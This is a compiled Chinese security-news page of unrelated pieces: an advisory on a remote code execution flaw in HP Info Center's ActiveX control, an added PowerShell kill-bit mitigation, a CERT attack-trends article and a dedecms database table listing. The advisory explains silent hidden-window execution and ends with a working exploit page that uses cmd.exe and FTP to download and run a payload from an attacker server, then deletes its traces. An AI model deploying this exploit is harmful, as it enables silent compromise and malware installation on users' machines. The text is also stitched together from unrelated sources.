Black Hat 2010 real-time news coverage


This year's series of Black Hat 2010 articles and videos can be seen here:
Address: http://www.searchsecurity.com.cn/microsites/2010blackhat/index.html




HP notebook ActiveX remote code execution exploit

Advisory: Multiple Hewlett-Packard notebook series are prone to a remote code execution attack. The manufacturer's preinstalled software contains a critical flaw within the software built to support one-touch button quick feature access.

Overview:
/////////
Software called "HP Info Center" has shipped with almost every HP laptop model for a few years. It is designed to support the user with quick system information and hardware configuration using a single button touch. One of its ActiveX controls, deployed by default by the vendor, has three insecure methods that allow a malicious person to target HP notebook machines for remote code execution and remote registry manipulation based attacks.

Impact:
///////
- Remote code execution
- Remote system registry read/write access
- Remote shell command execution

Attack vectors:
///////////////
The architecture of the vulnerable HP Info Center software gives an attacker a few different attack vector combinations:
- remote automated download and execute (e.g. malware installation)
- remote registry arbitrary key access (e.g. attack preparation, remote system info gathering)
- remote registry data modification (e.g. sensitive data manipulation, malware installation, DoS attacks)
- system disk data area manipulation and user documents alteration (e.g. system files manipulation, sensitive user documents access, entire system crash DoS attacks)

Any attack vector will always begin with an attempt to induce the remote user owning a vulnerable machine to launch an attacker-controlled WWW link. If the victim uses a different browser than IE, the attacker will probably attempt to induce them to open the malicious website from within IE. After that the attack will follow automatically and without any need for interaction with the victim.

Technical analysis:
///////////////////
The vulnerable ActiveX control HPInfoDLL.dll is a component of the HP Info Center application, which is a part of the HP Quick Launch Buttons software deployed by the manufacturer during a default HP machine OS installation. It has the following CLSID assigned: 62DDEB79-15B2-41E3-8834-D3B80493887A and is by default included in the "Safe for Scripting" OLE components group, which allows full scripting access to the control's methods from within the browser.

The default AX control installation path is C:\Program Files\Hewlett-Packard\HP Info Center

The control contains three potentially insecure methods:

VARIANT GetRegValue(String sHKey, String sectionName, String keyName);
void SetRegValue(String sHKey, String sSectionName, String sKeyName, String sValue);
void LaunchApp(String appPath, String params, int cmdShow);

The first and second methods are used to access the remote registry for read and write by the HP update and configuration software. To access a chosen registry key one must split its path into 3 string parameters: the HKey parameter containing the main key handle string (for example "HKEY_LOCAL_MACHINE"), the SectionName parameter, which is a double-slashed string path relative to the HKey, and the last one, the name of the key to access / modify.

The third method is used by the HP Info Center application to spawn utility programs from within the embedded IE window. When the user presses one of the Quick Launch buttons on the HP keyboard, the QLBCTRL.exe process launches the appropriate application, in this case HP INFO CENTER\hpinfocenter.exe, an application built to support the user with quick wifi configuration, update check and so on. The application window contains an embedded IE control to launch the HPINFO ActiveX CTL. IE uses the JS script 'HPInfoCenter.js', located in the same dir, to respond to user input. When the user selects the option he is interested in, the JS code executes the HPINFO control's LaunchApp() method, which spawns the new process using the JS-code-specified path (e.g. Wireless Assistant, Help and Support Center, ...).

The first problem is that the path variable passed as an argument to the LaunchApp() method doesn't distinguish between the global disk area and the local HP software area. Therefore, using this method, one is able to launch ANY executable binary within the system in the logged-in user's context. Combining this method with the system command shell, one can execute any shell command sequence within the remote user context (e.g. format, del, copy ...) by providing the '/c' switch as the first parameter for cmd.exe ("execute and exit" option).

At this point, owning shell command execution access, CreateProcess() win32 API function access and access to the system directory, we can construct an armed remote code execution exploit. All we need is to use the shell access to remotely build a batch file that, after being executed, will launch 'ftp.exe', the Windows NT ftp client utility, download an arbitrary remote file into the local system and execute it afterwards. Such an exploit, however, would have a visible cmd shell window during the exploit-driven download process, so it would be easily noticeable and would be cancelled by an alerted user. However, thanks to the vendor's programmers, we have a direct mapping of the ShowWindow() API function's second parameter 'cmdShow' through the LaunchApp() method interface. Passing the value 5 (SW_SHOW) here will make the created process's GDI window visible in its default shape. Passing the value 0 (SW_HIDE), however, will result in a totally window-less process creation that will continue its execution without its main window rendered and without any app icon on the taskbar.

In short: using the HPInfo ActiveX control one can construct a silent, windowless, background-running remote execution exploit, which, after being spawned by the user clicking the malicious website, will silently download arbitrary remote binary code and execute it afterwards, even when the user changes the browsed website during the exploit-driven download or even closes the browser before the exploit completes.

Vulnerable Software:
////////////////////
HP Info Center v1.0.1.1
HPInfoDll.dll ActiveX CTL v1.0
Internet Explorer 6.0
Internet Explorer 7.0
Windows XP Home
Windows XP Pro
Windows 2000
Windows 2003
Windows Vista

Vulnerable Hardware:
////////////////////
The following laptop models, with all vendor's software and OS updates installed, have been confirmed to be vulnerable:
HP 510 Notebook PC
HP 530 Notebook PC
HP Compaq 8710w
HP Compaq 8710p
HP Compaq 8510w
HP Compaq 8510p
HP Compaq 6910b
HP Compaq 6715b
HP Compaq 6510b
HP Compaq 2710p
HP Compaq 2510p
HP Compaq NC series Business Notebook PC
HP Compaq NC6230
HP Compaq NC6220
HP Compaq NC8230
HP Compaq NX series Business Notebook PC
HP Compaq NX7300
HP Compaq NX6120
HP Compaq NX8220
HP Compaq NX6325
HP Compaq NW series Mobile Workstation
HP Compaq NW9440
HP Compaq NW8440

NOTE that the listed models are the ones that have been quick-verified so far. Therefore a full and updated list of vulnerable machines/series should be released by the vendor's security response unit.

Concerning Vista:
/////////////////
A few laptop models which are Vista-ready can be bought with Vista preinstalled at the client's request. The owners of HP notebooks with the HP Info Center software and a preinstalled Vista OS can sleep half safely. The first good news is that the system will not allow an arbitrary new process to be spawned in a fully automated way from within the LaunchApp() method of the ActiveX control without interaction with the user, and will prompt him before spawning any child process, whether to allow the new process to run or not - that is the point where the user shall say NO to stay safe. The second good news is that the SetRegKey() method will NOT gain write access to the system registry within the vulnerable control context, and a registry write attempt will fail (note also that, because of its architecture, the "harakiri" fix-exploit under Vista WILL NOT patch the vulnerability). The bad news is that there is one attack vector which could exploit the vulnerability successfully under Vista - the remote system registry read attack. Although its final impact is relatively small, it can be used by a malicious entity to maintain system structure information gathering and user sensitive data access (access to registry-stored passwords and hashes, software configuration and versions, disk structure) and then to perform the final remote system attack.

Solution:
/////////
- Wait for the appropriate software update from the vendor
- Do not launch web site links from untrusted sources
- Install a non-Microsoft internet browser not allowing ActiveX (Firefox, Opera, Safari)
- Manually set the kill-bit for the vulnerable ActiveX control
- Launch the "harakiri" exploit listed in the links section, which shuts the vulnerable control down using the vulnerability itself

Unrelated final word:
/////////////////////
I think a company so deeply involved in the security software patents war should take bigger care about users' security than taking profits from the rights to the invention of the circle. After all, what are security software patents worth if it is the user who has the final word about their own software security...

Links:
//////
HPInfo vulnerability detection and fix-exploit site: www.anspi.pl/~porkythepig/hp-issue
The advisory text link: www.anspi.pl/~porkythepig/hp-issue/kilokieubasy.txt

Credits:
////////
Issue discovery and research: porkythepig
Contact: porkythepig@anspi.pl

<html><head><script language="JavaScript">var attackersFtpServerAddress="attacker.ftp.server";var attackersFtpUname="IDidntDoAnything";var attackersFtpPassword="password";var executableFileName="malware.exe";var cnt,p;function spawn2(){o2obj.LaunchApp("c:\windows\system32\cmd.exe","/C echo open "+attackersFtpServerAddress+" >> c:\ftpd&echo "+attackersFtpUname+">> c:\ftpd&echo "+attackersFtpPassword+">> c:\ftpd&echo binary>> c:\ftpd&echo get "+executableFileName+"c:\"+executableFileName+" >> c:\ftpd&echo quit>> c:\ftpd",0);o2obj.LaunchApp("c:\windows\system32\cmd.exe","/C echo cd c:\>> c:\ftpd.bat"+"&echo ftp -s:ftpd>> c:\ftpd.bat&echo start c:\"+executableFileName+" >> c:\ftpd.bat",0);o2obj.LaunchApp("c:\windows\system32\cmd.exe","/C c:\ftpd.bat&del "+"c:\ftpd.bat&del c:\ftpd&del c:\"+executableFileName,0);}</script></head><body onload="spawn2()"><object ID="o2obj" WIDTH=0 HEIGHT=0   classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A"</object></body></html>

Attachment: hp.rar
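The kill-bit mitigation from the advisory's Solution section, as an added defensive example that is not part of the original post or of HP's software; it assumes an elevated PowerShell session on the affected Windows versions and uses only the CLSID given in the advisory:

```powershell
# Added example, not from the advisory: set the IE ActiveX kill-bit for the
# HPInfoDLL.dll control so Internet Explorer refuses to instantiate it, even
# though the control is registered as "Safe for Scripting". Run elevated.
$clsid   = '{62DDEB79-15B2-41E3-8834-D3B80493887A}'   # CLSID from the advisory
$KillBit = 0x400                                        # "Compatibility Flags" kill bit

# Detection step: is the control registered on this machine at all?
$regCls = "HKLM:\SOFTWARE\Classes\CLSID\$clsid\InprocServer32"
if (Test-Path $regCls) {
    $dll = (Get-ItemProperty -Path $regCls).'(default)'
    Write-Output "HPInfo control registered: $dll"
} else {
    Write-Output "Control not registered; setting the kill bit anyway as a precaution."
}

# IE reads the kill bit from the 'ActiveX Compatibility' key. On 64-bit Windows
# the 32-bit IE uses the Wow6432Node view, so cover both views where they exist.
$compatKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)
foreach ($key in $compatKeys) {
    if (-not (Test-Path (Split-Path $key -Parent))) { continue }   # this view is absent
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }

    # OR the kill bit into any flags already present rather than overwriting them.
    $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    $flags = ([int]$current) -bor $KillBit
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $flags -Type DWord

    # Verify: the bit must read back as set, otherwise the mitigation is not in place.
    $check = (Get-ItemProperty -Path $key -Name 'Compatibility Flags').'Compatibility Flags'
    if (($check -band $KillBit) -ne $KillBit) { throw "Kill bit not set under $key" }
    Write-Output "Kill bit set under $key"
}
```

Unlike the "harakiri" fix-exploit mentioned in the advisory, this works through the registry directly and therefore does not depend on the vulnerable control being scriptable.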

Four latest trends in hacker intrusion attack methods

Since 1988, the CERT CC (Computer Emergency Response Team Coordination Center) at Carnegie Mellon University in the United States has been investigating intruder activity. CERT CC gives some trends regarding the latest intruder attack methods.

Trend one: automation of the attack process and rapid updating of attack tools
  The degree of automation of attack tools continues to increase. All four stages involved in automated attacks have changed.
  1. Scanning for potential victims. Large-scale scanning activity began to appear in 1997. Now, new scanning tools use more advanced scanning techniques, have become more powerful, and are faster.
  2. Compromising vulnerable systems. Previously, attacks on vulnerable systems took place after wide-ranging scans. Now, attack tools have built the exploitation of vulnerabilities into the scanning activity itself, which greatly speeds up intrusion.
  3. Attack propagation. Before 2000, attack tools needed a human to launch the rest of the attack process. Now, attack tools can launch new attack processes automatically. For example, tools such as Code Red and the Nimda virus spread across the globe within 18 hours.
  4. Coordinated management of attack tools. Since 1999, with the emergence of distributed attack tools, attackers have been able to launch attacks with large numbers of attack tools distributed across the Internet. Now attackers can launch a distributed denial-of-service attack more effectively. The coordination function makes use of many popular protocols such as IRC (Internet Relay Chat) and IM (Instant Messaging).

Trend two: increasing sophistication of attack tools
  Attack tool authors are using more advanced techniques than before. Attack tool signatures are becoming harder to discover through analysis, and harder to detect with signature-based detection systems such as antivirus software and intrusion detection systems. Three important characteristics of today's attack tools are anti-detection features, dynamic behaviour and modularity.
  1. Anti-detection. Attackers use techniques that hide attack tools. This makes it more difficult and time-consuming for security experts to determine the course of a new attack through various analysis methods.
  2. Dynamic behaviour. Earlier attack tools launched attacks following a single predetermined sequence of steps. Today's automated attack tools can change their characteristics in different ways, such as random selection, predefined decision paths, or direct control by the intruder.
  3. Modularity of attack tools. Compared with earlier tools that implemented only one attack, new attack tools can be changed rapidly by upgrading or replacing some modules. Moreover, attack tools can run on more and more platforms. For example, many attack tools use standard protocols such as IRC and HTTP to transmit data and commands, which makes it even harder to pick out attack signatures from normal network traffic.

Trend three: vulnerabilities are discovered faster
  The number of vulnerabilities reported to CERT/CC doubles every year. The vulnerability figures published by CERT/CC were 1,090 in 2000, 2,437 in 2001, and had risen to 4,129 in 2002, meaning more than ten new vulnerabilities are discovered every day. As one can imagine, it is very hard for administrators to keep pace with patches. Moreover, intruders are often able to discover these vulnerabilities before the software vendors patch them. With the trend toward automated vulnerability discovery tools, the time left for users to apply patches is getting shorter and shorter. Buffer overflow vulnerabilities in particular, which are extremely harmful and ubiquitous, are the greatest threat to computer security. In surveys by CERT and other international network security organizations, this type of vulnerability is the one with the most serious consequences for servers.

Trend four: penetrating firewalls
  We often rely on firewalls to provide the main security boundary protection. But the situation is:
  * Techniques already exist for bypassing typical firewall configurations, such as IPP (the Internet Printing Protocol) and WebDAV (Web-based Distributed Authoring and Versioning)
  * Some protocols advertised as "firewall-friendly" are actually designed to bypass typical firewall configurations.
  Certain kinds of "mobile code" (such as ActiveX controls, Java and JavaScript) make it harder to protect vulnerable systems and to discover malicious software.
  In addition, as the number of computers on the Internet keeps growing, there is strong interdependence among all computers. Once some computers are compromised, they may become the intruder's base and stepping stone, serving as tools for further attacks. Attacks on network infrastructure such as the DNS system and routers are also becoming an increasingly serious security threat.

Adopting proactive defence measures against a new generation of network attacks
  The "Code Red" worm infected more than 250,000 computer systems within the first nine hours of spreading on the Internet. The cost of this infection grew rapidly at 200 million US dollars per day, with final losses as high as 2.6 billion US dollars. The threat of the rapid spread of "Code Red", "Code Red II", "Nimda" and "Klez" shows the serious limitations of existing network defences. Most intrusion detection systems on the market are simple and have insufficient means of defending against new, unknown threats in the network, commonly called "zero-day attacks".

The hacker's "window of opportunity"
  Most current intrusion detection systems are limited because they use signatures to identify whether attack behaviour is present. These systems use this approach to monitor for specific attack patterns. They rely on identification information stored in their databases, similar to the way antivirus software checks for known viruses. This means these systems can only detect the specific attacks that have been programmed into their recognition routines. Because "zero-day attacks" are newly emerging and not yet widely recognised, they can bypass these security systems before new signatures are developed, installed and configured. In fact, only slight modifications to known attack methods are needed for these systems to no longer recognise them, which gives intruders a means of evading signature-based defence systems.
  The period from the launch of a new attack to the development of a new signature is a dangerous "window of opportunity" during which many networks can be breached. At this time many fast intrusion tools are designed and developed, and networks are easily attacked. The chart below illustrates why most security products are in fact ineffective during this period. This chart, produced by CERT, shows the typical life cycle of a network attack. The peak of the curve comes just after the attack's first strike, which is when most security products finally begin to provide protection. However, "zero-day attacks" are what the most experienced hackers focus on during the earliest stage.
  At the same time, today's fast-moving attacks exploit security vulnerabilities in widely used computer software to cause more widely distributed damage. With just a few lines of code, they can write a worm that penetrates a computer network, clones itself through shared accounts, and then begins attacking the networks of your peers and users. Using this approach, in the time between the vendor developing a signature and distributing it to users, the "Nimda worm" spread to more than 100,000 network sites in the United States alone. These distribution mechanisms allowed "zero-day attacks" such as the SirCam and Love Bug viruses to sweep across 2.3 million and 40 million computers respectively, without much human intervention. Some of these attacks even laid the groundwork for future damage by installing a backdoor that allows adversaries, hackers and other unauthorised users to access an organization's critical data and network resources.

dedecms database table structure

Each table is listed as: column name, column type, description.

dede_addonarticle (additional article table)
aid int(11) article id
typeid int(11) category column id
body mediumtext article content

dede_addonflash (additional Flash table)
aid int(11) Flash id
typeid int(11) category column id
filesize varchar(10) file size
playtime varchar(10) play duration
flashtype varchar(10) work type
flashrank smallint(6) work rating
width smallint(6) movie width
height smallint(6) movie height
flashurl varchar(80) Flash URL

dede_addonimages (additional image gallery table)
aid int(11) gallery id
typeid int(11) category column id
pagestyle smallint(6) display mode (1 single page, 2 split over multiple pages, 3 multi-row multi-column grid)
maxwidth smallint(6) large image width limit
imgurls text gallery content (stored as tags)
row smallint(6) grid parameter (rows)
col smallint(6) grid parameter (columns)
isrm smallint(6) whether to download remote images
ddmaxwidth smallint(6) thumbnail width limit

dede_addonsoft (additional software table)
aid int(11) software id
typeid int(11) category column id
filetype varchar(10) file type
language varchar(10) interface language
softtype varchar(10) software type
accredit varchar(10) licence type
os varchar(30) runtime environment
softrank int(11) software rating
officialUrl varchar(30) official website
officialDemo varchar(50) demo URL
softsize varchar(10) software size
softlinks text download link list
introduce text software description

dede_addonspec (additional special-topic table)
aid int(11) topic id
typeid int(11) category column id
note text topic content (tag code only)

dede_admin (administrator table)
ID int(10) auto-increment id
usertype int(10) user type
userid varchar(30) login id
pwd varchar(50) password
uname varchar(20) pen name
tname varchar(30) real name
email varchar(30) email address
typeid int(11) channel in charge of (0 = all)
logintime datetime login time
loginip varchar(20) login IP

dede_admintype (system user group table)
rank smallint(6) group level id
typename varchar(30) group name
system smallint(6) whether a system default group
purviews text permission list

dede_arcatt (document custom attribute table)
att smallint(6) id
attname varchar(30) attribute name

dede_archives (article table)
ID int(11) auto-increment id
typeid int(11) main column id
typeid2 int(11) secondary column id
sortrank int(11) article sort order (used for pinning)
iscommend smallint(6) recommended
ismake smallint(6) whether static page generated
channel int(11) content model the article belongs to
arcrank smallint(6) read permission
click int(11) click count
money smallint(6) points cost
title varchar(80) title
shorttitle varchar(36) short title
color varchar(10) title colour
writer varchar(30) author
source varchar(50) source
litpic varchar(100) thumbnail
pubdate int(11) entry time
senddate int(11) publish time
arcatt smallint(6) custom attribute (att)
adminID int(11) publishing administrator id
memberID int(11) publishing member id
description varchar(250) summary
keywords varchar(60) keywords
templet varchar(60) document template
lastpost int(11) last comment time
postnum int(11) comment count
redirecturl varchar(150) redirect URL
mtype int(11) user-defined category
userip varchar(20) user IP
locklikeid smallint(6) whether related articles are locked
likeid varchar(240) related article ids

dede_arcrank (read permission table)
ID int(10) auto-increment id
rank smallint(10) permission level
membername varchar(20) level name
adminrank smallint(10) admin level
money int(11) points cost

dede_arctype (column management table)
ID int(10) column id (auto-increment)
reID int(10) parent column id
topID int(10)
sortrank smallint(6) sort order
typename varchar(30) column name
typedir varchar(100) column directory
isdefault smallint(6) column list option (1 link to default page, 0 link to first list page, -1 use dynamic page)
defaultname varchar(20) default page name
issend smallint(6) whether submissions are accepted
channeltype smallint(6) channel type
maxpage int(11) reserved
ispart smallint(6) column attribute
corank smallint(6) browse permission
tempindex varchar(60) cover template
templist varchar(60) list template
temparticle varchar(60) article template
tempone varchar(60) standalone page template
namerule varchar(50) article naming rule
namerule2 varchar(50) list naming rule
modname varchar(30) template name
description varchar(200) column description
keywords varchar(100) keywords
moresite smallint(6) multi-site support
siterefer smallint(6) multi-site root directory attribute
sitepath varchar(60) multi-site root directory
siteurl varchar(60) multi-site bound domain
ishidden smallint(6) whether the column is hidden

dede_area (region table)
eid int(11) region id
name varchar(20) region name
rid int(11) id attribute